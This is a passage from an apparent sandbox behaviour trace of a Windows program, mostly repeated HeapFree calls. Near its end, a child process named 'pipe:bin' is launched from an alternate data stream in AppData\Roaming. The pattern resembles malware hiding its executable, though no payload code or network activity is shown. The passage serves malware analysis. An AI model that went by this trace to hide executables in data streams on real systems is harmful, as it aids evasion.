dwFlags=0x0, lpMem=0x44e958 | out: hHeap=0x420000) returned 1 [0030.344] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x44ea28 | out: hHeap=0x420000) returned 1 [0030.344] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x44eaf8 | out: hHeap=0x420000) returned 1 [0030.345] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x44ebc8 | out: hHeap=0x420000) returned 1 [0030.345] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x44eca0 | out: hHeap=0x420000) returned 1 [0030.345] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x44ed80 | out: hHeap=0x420000) returned 1 [0030.345] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x44ee50 | out: hHeap=0x420000) returned 1 [0030.345] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x44ef18 | out: hHeap=0x420000) returned 1 [0030.345] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x44cf40 | out: hHeap=0x420000) returned 1 [0030.345] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x44d008 | out: hHeap=0x420000) returned 1 [0030.345] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x44d0d8 | out: hHeap=0x420000) returned 1 [0030.345] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x44d1a0 | out: hHeap=0x420000) returned 1 [0030.345] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x44d278 | out: hHeap=0x420000) returned 1 [0030.345] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x44d340 | out: hHeap=0x420000) returned 1 [0030.345] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x44d420 | out: hHeap=0x420000) returned 1 [0030.345] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x44d4f8 | out: hHeap=0x420000) returned 1 [0030.345] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x44d5d0 | out: hHeap=0x420000) returned 1 [0030.345] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x44d6b0 | out: hHeap=0x420000) returned 1 [0030.345] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x44d780 | out: hHeap=0x420000) returned 1 [0030.345] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x44d848 | out: hHeap=0x420000) returned 1 [0030.345] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x44d920 | out: hHeap=0x420000) returned 1 [0030.345] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x44da08 | out: hHeap=0x420000) returned 1 [0030.345] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x44dae8 | out: hHeap=0x420000) returned 1 [0030.345] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x44dbc8 | out: hHeap=0x420000) returned 1 [0030.345] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x44dc98 | out: hHeap=0x420000) returned 1 [0030.345] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x44dd70 | out: hHeap=0x420000) returned 1 [0030.345] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x44de40 | out: hHeap=0x420000) returned 1 [0030.345] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x44df10 | out: hHeap=0x420000) returned 1 [0030.345] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x44dfe0 | out: hHeap=0x420000) returned 1 [0030.345] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x44e0b0 | out: hHeap=0x420000) returned 1 [0030.345] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x44efe8 | out: hHeap=0x420000) returned 1 [0030.345] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x44f0b8 | out: hHeap=0x420000) returned 1 [0030.345] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x44f180 | out: hHeap=0x420000) returned 1 [0030.345] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x44f250 | out: hHeap=0x420000) returned 1 [0030.345] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x44f320 | out: hHeap=0x420000) returned 1 [0030.345] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x44f3e8 | out: hHeap=0x420000) returned 1 [0030.345] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x44f4b8 | out: hHeap=0x420000) returned 1 [0030.345] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x44f5a8 | out: hHeap=0x420000) returned 1 [0030.345] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x451590 | out: hHeap=0x420000) returned 1 [0030.345] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x451670 | out: hHeap=0x420000) returned 1 [0030.345] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x453658 | out: hHeap=0x420000) returned 1 [0030.345] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x451740 | out: hHeap=0x420000) returned 1 [0030.345] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x451810 | out: hHeap=0x420000) returned 1 [0030.346] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x4518e0 | out: hHeap=0x420000) returned 1 [0030.346] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x4519b0 | out: hHeap=0x420000) returned 1 [0030.346] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x453720 | out: hHeap=0x420000) returned 1 [0030.346] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x451a80 | out: hHeap=0x420000) returned 1 [0030.346] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x4537e8 | out: hHeap=0x420000) returned 1 [0030.346] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x451b50 | out: hHeap=0x420000) returned 1 [0030.346] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x44f680 | out: hHeap=0x420000) returned 1 [0030.346] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x451c20 | out: hHeap=0x420000) returned 1 [0030.346] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x4538b0 | out: hHeap=0x420000) returned 1 [0030.346] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x451cf0 | out: hHeap=0x420000) returned 1 [0030.346] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x451dc0 | out: hHeap=0x420000) returned 1 [0030.346] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x453990 | out: hHeap=0x420000) returned 1 [0030.346] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x453a70 | out: hHeap=0x420000) returned 1 [0030.346] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x44f758 | out: hHeap=0x420000) returned 1 [0030.346] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x453b50 | out: hHeap=0x420000) returned 1 [0030.346] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x453bf8 | out: hHeap=0x420000) returned 1 [0030.346] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x453c98 | out: hHeap=0x420000) returned 1 [0030.346] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x453d48 | out: hHeap=0x420000) returned 1 [0030.346] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x453de8 | out: hHeap=0x420000) returned 1 [0030.346] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x453e90 | out: hHeap=0x420000) returned 1 [0030.346] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x453f38 | out: hHeap=0x420000) returned 1 [0030.346] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x453ff8 | out: hHeap=0x420000) returned 1 [0030.346] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x4540a0 | out: hHeap=0x420000) returned 1 [0030.346] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x454158 | out: hHeap=0x420000) returned 1 [0030.346] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x456140 | out: hHeap=0x420000) returned 1 [0030.346] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x4561d8 | out: hHeap=0x420000) returned 1 [0030.346] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x456280 | out: hHeap=0x420000) returned 1 [0030.346] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x456330 | out: hHeap=0x420000) returned 1 [0030.346] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x4563d8 | out: hHeap=0x420000) returned 1 [0030.346] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x456470 | out: hHeap=0x420000) returned 1 [0030.346] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x456518 | out: hHeap=0x420000) returned 1 [0030.346] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x4541f8 | out: hHeap=0x420000) returned 1 [0030.346] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x454298 | out: hHeap=0x420000) returned 1 [0030.346] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x454338 | out: hHeap=0x420000) returned 1 [0030.346] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x4543d8 | out: hHeap=0x420000) returned 1 [0030.346] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x454478 | out: hHeap=0x420000) returned 1 [0030.346] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x4565b0 | out: hHeap=0x420000) returned 1 [0030.346] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x456670 | out: hHeap=0x420000) returned 1 [0030.346] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x456718 | out: hHeap=0x420000) returned 1 [0030.346] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x4567c0 | out: hHeap=0x420000) returned 1 [0030.346] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x458658 | out: hHeap=0x420000) returned 1 [0030.347] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x456868 | out: hHeap=0x420000) returned 1 [0030.347] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x458710 | out: hHeap=0x420000) returned 1 [0030.347] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x456910 | out: hHeap=0x420000) returned 1 [0030.347] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x4569b8 | out: hHeap=0x420000) returned 1 [0030.347] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x456a60 | out: hHeap=0x420000) returned 1 [0030.347] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x4587d0 | out: hHeap=0x420000) returned 1 [0030.347] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x458880 | out: hHeap=0x420000) returned 1 [0030.347] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x454518 | out: hHeap=0x420000) returned 1 [0030.347] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x4545b8 | out: hHeap=0x420000) returned 1 [0030.347] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x454658 | out: hHeap=0x420000) returned 1 [0030.347] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x456b08 | out: hHeap=0x420000) returned 1 [0030.347] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x4546f8 | out: hHeap=0x420000) returned 1 [0030.347] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x456bb0 | out: hHeap=0x420000) returned 1 [0030.347] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x458930 | out: hHeap=0x420000) returned 1 [0030.347] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x4589e8 | out: hHeap=0x420000) returned 1 [0030.347] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x456c58 | out: hHeap=0x420000) returned 1 [0030.347] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x456d00 | out: hHeap=0x420000) returned 1 [0030.347] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x454798 | out: hHeap=0x420000) returned 1 [0030.347] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x454838 | out: hHeap=0x420000) returned 1 [0030.347] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x456da8 | out: hHeap=0x420000) returned 1 [0030.347] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x456e50 | out: hHeap=0x420000) returned 1 [0030.347] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x4548d8 | out: hHeap=0x420000) returned 1 [0030.347] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x456ef8 | out: hHeap=0x420000) returned 1 [0030.347] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x454978 | out: hHeap=0x420000) returned 1 [0030.347] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x458aa0 | out: hHeap=0x420000) returned 1 [0030.347] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x454a18 | out: hHeap=0x420000) returned 1 [0030.347] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x456fa0 | out: hHeap=0x420000) returned 1 [0030.347] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x457048 | out: hHeap=0x420000) returned 1 [0030.347] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x4570f0 | out: hHeap=0x420000) returned 1 [0030.347] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x457198 | out: hHeap=0x420000) returned 1 [0030.347] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x457240 | out: hHeap=0x420000) returned 1 [0030.347] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x4572e8 | out: hHeap=0x420000) returned 1 [0030.347] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x457390 | out: hHeap=0x420000) returned 1 [0030.347] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x457438 | out: hHeap=0x420000) returned 1 [0030.347] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x4574e0 | out: hHeap=0x420000) returned 1 [0030.347] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x454ab8 | out: hHeap=0x420000) returned 1 [0030.347] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x454b58 | out: hHeap=0x420000) returned 1 [0030.347] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x454bf8 | out: hHeap=0x420000) returned 1 [0030.347] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x457588 | out: hHeap=0x420000) returned 1 [0030.347] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x457630 | out: hHeap=0x420000) returned 1 [0030.348] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x454c98 | out: hHeap=0x420000) returned 1 [0030.348] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x458b58 | out: hHeap=0x420000) returned 1 [0030.348] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x458c10 | out: hHeap=0x420000) returned 1 [0030.348] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x454d38 | out: hHeap=0x420000) returned 1 [0030.348] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x454dd8 | out: hHeap=0x420000) returned 1 [0030.348] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x454e78 | out: hHeap=0x420000) returned 1 [0030.348] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x454f18 | out: hHeap=0x420000) returned 1 [0030.348] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x458cc8 | out: hHeap=0x420000) returned 1 [0030.348] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x454fb8 | out: hHeap=0x420000) returned 1 [0030.348] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x455058 | out: hHeap=0x420000) returned 1 [0030.348] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x4576d8 | out: hHeap=0x420000) returned 1 [0030.348] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x457780 | out: hHeap=0x420000) returned 1 [0030.348] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x458d78 | out: hHeap=0x420000) returned 1 [0030.348] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x4550f8 | out: hHeap=0x420000) returned 1 [0030.348] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x455198 | out: hHeap=0x420000) returned 1 [0030.348] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x458e10 | out: hHeap=0x420000) returned 1 [0030.348] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x455238 | out: hHeap=0x420000) returned 1 [0030.348] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x457828 | out: hHeap=0x420000) returned 1 [0030.348] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x458ec8 | out: hHeap=0x420000) returned 1 [0030.348] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x458f78 | out: hHeap=0x420000) returned 1 [0030.348] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x4552d8 | out: hHeap=0x420000) returned 1 [0030.348] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x4578d0 | out: hHeap=0x420000) returned 1 [0030.348] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x455378 | out: hHeap=0x420000) returned 1 [0030.348] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x457978 | out: hHeap=0x420000) returned 1 [0030.348] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x455418 | out: hHeap=0x420000) returned 1 [0030.348] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x457a20 | out: hHeap=0x420000) returned 1 [0030.348] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x457ac8 | out: hHeap=0x420000) returned 1 [0030.348] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x4554b8 | out: hHeap=0x420000) returned 1 [0030.348] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x455558 | out: hHeap=0x420000) returned 1 [0030.348] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x4555f8 | out: hHeap=0x420000) returned 1 [0030.348] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x455698 | out: hHeap=0x420000) returned 1 [0030.348] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x455738 | out: hHeap=0x420000) returned 1 [0030.348] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x4557d8 | out: hHeap=0x420000) returned 1 [0030.348] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x459028 | out: hHeap=0x420000) returned 1 [0030.348] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x4590e0 | out: hHeap=0x420000) returned 1 [0030.348] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x455878 | out: hHeap=0x420000) returned 1 [0030.348] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x459178 | out: hHeap=0x420000) returned 1 [0030.348] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x455918 | out: hHeap=0x420000) returned 1 [0030.348] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x457b70 | out: hHeap=0x420000) returned 1 [0030.348] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x4559b8 | out: hHeap=0x420000) returned 1 [0030.348] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x457c18 | out: hHeap=0x420000) returned 1 [0030.348] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x457cc0 | out: hHeap=0x420000) returned 1 [0030.348] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x455a58 | out: hHeap=0x420000) returned 1 [0030.349] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x455af8 | out: hHeap=0x420000) returned 1 [0030.349] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x455b98 | out: hHeap=0x420000) returned 1 [0030.349] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x459210 | out: hHeap=0x420000) returned 1 [0030.349] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x457d68 | out: hHeap=0x420000) returned 1 [0030.349] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x455c38 | out: hHeap=0x420000) returned 1 [0030.349] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x455cd8 | out: hHeap=0x420000) returned 1 [0030.349] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x4592a8 | out: hHeap=0x420000) returned 1 [0030.349] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x455d78 | out: hHeap=0x420000) returned 1 [0030.349] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x459358 | out: hHeap=0x420000) returned 1 [0030.349] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x455e18 | out: hHeap=0x420000) returned 1 [0030.349] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x455eb8 | out: hHeap=0x420000) returned 1 [0030.349] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x455f58 | out: hHeap=0x420000) returned 1 [0030.349] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x455ff8 | out: hHeap=0x420000) returned 1 [0030.349] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x457e10 | out: hHeap=0x420000) returned 1 [0030.349] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x456098 | out: hHeap=0x420000) returned 1 [0030.349] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x457eb8 | out: hHeap=0x420000) returned 1 [0030.349] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x457f60 | out: hHeap=0x420000) returned 1 [0030.349] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x459420 | out: hHeap=0x420000) returned 1 [0030.349] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x4594c0 | out: hHeap=0x420000) returned 1 [0030.349] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x458008 | out: hHeap=0x420000) returned 1 [0030.349] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x4580b0 | out: hHeap=0x420000) returned 1 [0030.349] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x459560 | out: hHeap=0x420000) returned 1 [0030.349] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x45c668 | out: hHeap=0x420000) returned 1 [0030.349] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x458158 | out: hHeap=0x420000) returned 1 [0030.349] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x45c718 | out: hHeap=0x420000) returned 1 [0030.349] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x459600 | out: hHeap=0x420000) returned 1 [0030.349] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x458200 | out: hHeap=0x420000) returned 1 [0030.349] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x4582a8 | out: hHeap=0x420000) returned 1 [0030.349] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x4596a0 | out: hHeap=0x420000) returned 1 [0030.349] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x459740 | out: hHeap=0x420000) returned 1 [0030.349] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x4597e0 | out: hHeap=0x420000) returned 1 [0030.349] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x458350 | out: hHeap=0x420000) returned 1 [0030.349] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x45b408 | out: hHeap=0x420000) returned 1 [0030.349] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x459880 | out: hHeap=0x420000) returned 1 [0030.349] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x459920 | out: hHeap=0x420000) returned 1 [0030.349] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x4599c0 | out: hHeap=0x420000) returned 1 [0030.349] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x459a60 | out: hHeap=0x420000) returned 1 [0030.349] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x459b00 | out: hHeap=0x420000) returned 1 [0030.349] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x4583f8 | out: hHeap=0x420000) returned 1 [0030.350] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x459ba0 | out: hHeap=0x420000) returned 1 [0030.350] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x459c40 | out: hHeap=0x420000) returned 1 [0030.350] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x459ce0 | out: hHeap=0x420000) returned 1 [0030.350] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x459d80 | out: hHeap=0x420000) returned 1 [0030.350] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x459e20 | out: hHeap=0x420000) returned 1 [0030.350] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x4584a0 | out: hHeap=0x420000) returned 1 [0030.350] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x459ec0 | out: hHeap=0x420000) returned 1 [0030.350] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x459f60 | out: hHeap=0x420000) returned 1 [0030.350] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x45a000 | out: hHeap=0x420000) returned 1 [0030.350] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x45a0a0 | out: hHeap=0x420000) returned 1 [0030.350] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x45a140 | out: hHeap=0x420000) returned 1 [0030.350] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x458548 | out: hHeap=0x420000) returned 1 [0030.350] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x45c7e0 | out: hHeap=0x420000) returned 1 [0030.374] WaitForSingleObject (hHandle=0x98, dwMilliseconds=0xffffffff) Thread: id = 37 os_tid = 0xb78 Process: id = "2" image_name = "pipe:bin" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\pipe:bin" page_root = "0x4cb46000" os_pid = "0xa80" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x688" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Pipe:bin\" -r" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 2 os_tid = 0xa78 [0030.428] GetModuleHandleA (lpModuleName=0x0) returned 0x1000000 [0030.428] GetProcessHeap () returned 0x340000 [0030.428] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x4681) returned 0x354be0 [0030.432] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff5c | out: lpSystemTimeAsFileTime=0x18ff5c*(dwLowDateTime=0xb7308a40, dwHighDateTime=0x1d64ac6)) [0030.432] QueryPerformanceFrequency (in: lpFrequency=0x18ff64 | out: lpFrequency=0x18ff64*=100000000) returned 1 [0030.432] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff54 | out: lpPerformanceCount=0x18ff54*=15117766344) returned 1 [0030.432] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x90 [0030.432] GetModuleHandleA (lpModuleName=0x0) returned 0x1000000 [0030.432] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x208) returned 0x359270 [0030.433] GetModuleFileNameW (in: hModule=0x1000000, lpFilename=0x359270, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS 